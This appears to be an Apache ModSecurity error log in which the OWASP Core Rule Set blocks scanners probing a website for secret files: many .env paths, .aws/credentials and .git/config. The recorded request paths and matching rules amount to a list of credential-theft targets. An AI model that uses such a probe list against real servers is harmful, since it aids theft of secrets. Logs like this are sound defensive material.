[Tue May 20 02:41:54.006129 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aCvP0rObYKFKb3Q2fU-NUQAAAAU"]
[Tue May 20 02:41:54.006318 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aCvP0rObYKFKb3Q2fU-NUQAAAAU"]
[Tue May 20 02:41:55.128234 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUgAAAAU"]
[Tue May 20 02:41:55.128441 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUgAAAAU"]
[Tue May 20 02:41:55.128612 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUgAAAAU"]
[Tue May 20 02:41:55.229760 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUwAAAAU"]
[Tue May 20 02:41:55.229975 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUwAAAAU"]
[Tue May 20 02:41:55.230150 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aCvP07ObYKFKb3Q2fU-NUwAAAAU"]
[Tue May 20 02:41:56.019950 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aCvP1LObYKFKb3Q2fU-NVAAAAAU"]
[Tue May 20 02:41:56.020184 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aCvP1LObYKFKb3Q2fU-NVAAAAAU"]
[Tue May 20 02:41:56.020365 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aCvP1LObYKFKb3Q2fU-NVAAAAAU"]
[Tue May 20 02:41:56.170500 2025] [authz_core:error] [pid 3281133] [client 94.26.90.191:38024] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Tue May 20 02:41:57.245038 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aCvP1bObYKFKb3Q2fU-NVgAAAAU"]
[Tue May 20 02:41:57.245273 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aCvP1bObYKFKb3Q2fU-NVgAAAAU"]
[Tue May 20 02:41:57.245480 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aCvP1bObYKFKb3Q2fU-NVgAAAAU"]
[Tue May 20 02:41:57.374891 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aCvP1bObYKFKb3Q2fU-NVwAAAAU"]
[Tue May 20 02:41:57.375114 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aCvP1bObYKFKb3Q2fU-NVwAAAAU"]
[Tue May 20 02:41:57.375287 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aCvP1bObYKFKb3Q2fU-NVwAAAAU"]
[Tue May 20 02:41:58.270025 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aCvP1rObYKFKb3Q2fU-NWAAAAAU"]
[Tue May 20 02:41:58.270296 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aCvP1rObYKFKb3Q2fU-NWAAAAAU"]
[Tue May 20 02:41:58.270493 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/home/user/.aws/credentials"] [unique_id "aCvP1rObYKFKb3Q2fU-NWAAAAAU"]
[Tue May 20 02:41:58.431890 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aCvP1rObYKFKb3Q2fU-NWQAAAAU"]
[Tue May 20 02:41:58.432098 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aCvP1rObYKFKb3Q2fU-NWQAAAAU"]
[Tue May 20 02:41:58.432282 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aCvP1rObYKFKb3Q2fU-NWQAAAAU"]
[Tue May 20 02:41:59.346810 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aCvP17ObYKFKb3Q2fU-NWgAAAAU"]
[Tue May 20 02:41:59.347013 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aCvP17ObYKFKb3Q2fU-NWgAAAAU"]
[Tue May 20 02:41:59.347218 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aCvP17ObYKFKb3Q2fU-NWgAAAAU"]
[Tue May 20 02:41:59.457042 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aCvP17ObYKFKb3Q2fU-NWwAAAAU"]
[Tue May 20 02:41:59.457246 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aCvP17ObYKFKb3Q2fU-NWwAAAAU"]
[Tue May 20 02:41:59.457423 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aCvP17ObYKFKb3Q2fU-NWwAAAAU"]
[Tue May 20 02:42:00.239318 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aCvP2LObYKFKb3Q2fU-NXAAAAAU"]
[Tue May 20 02:42:00.239537 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aCvP2LObYKFKb3Q2fU-NXAAAAAU"]
[Tue May 20 02:42:00.239740 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aCvP2LObYKFKb3Q2fU-NXAAAAAU"]
[Tue May 20 05:14:46.215386 2025] [:error] [pid 3285068] [client 91.206.169.53:56374] [client 91.206.169.53] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvzpsdTGZT7aIpttHBDpQAAAAY"]
[Tue May 20 05:14:46.215689 2025] [:error] [pid 3285068] [client 91.206.169.53:56374] [client 91.206.169.53] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvzpsdTGZT7aIpttHBDpQAAAAY"]
[Tue May 20 05:14:46.215864 2025] [:error] [pid 3285068] [client 91.206.169.53:56374] [client 91.206.169.53] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvzpsdTGZT7aIpttHBDpQAAAAY"]
[Tue May 20 08:37:22.159695 2025] [:error] [pid 3283593] [client 34.229.113.34:41378] [client 34.229.113.34] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCwjImlgD_0X9-csKa_4iQAAAAE"]
[Tue May 20 08:37:22.159987 2025] [:error] [pid 3283593] [client 34.229.113.34:41378] [client 34.229.113.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCwjImlgD_0X9-csKa_4iQAAAAE"]
[Tue May 20 08:37:22.160171 2025] [:error] [pid 3283593] [client 34.229.113.34:41378] [client 34.229.113.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCwjImlgD_0X9-csKa_4iQAAAAE"]
[Fri May 23 18:10:08.163269 2025] [:error] [pid 3348064] [client 194.50.16.252:51082] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDCd4LuqmeEMC48ZcN3bRgAAAAQ"]
[Fri May 23 18:10:08.163686 2025] [:error] [pid 3348064] [client 194.50.16.252:51082] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDCd4LuqmeEMC48ZcN3bRgAAAAQ"]
[Fri May 23 18:10:08.163942 2025] [:error] [pid 3348064] [client 194.50.16.252:51082] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDCd4LuqmeEMC48ZcN3bRgAAAAQ"]
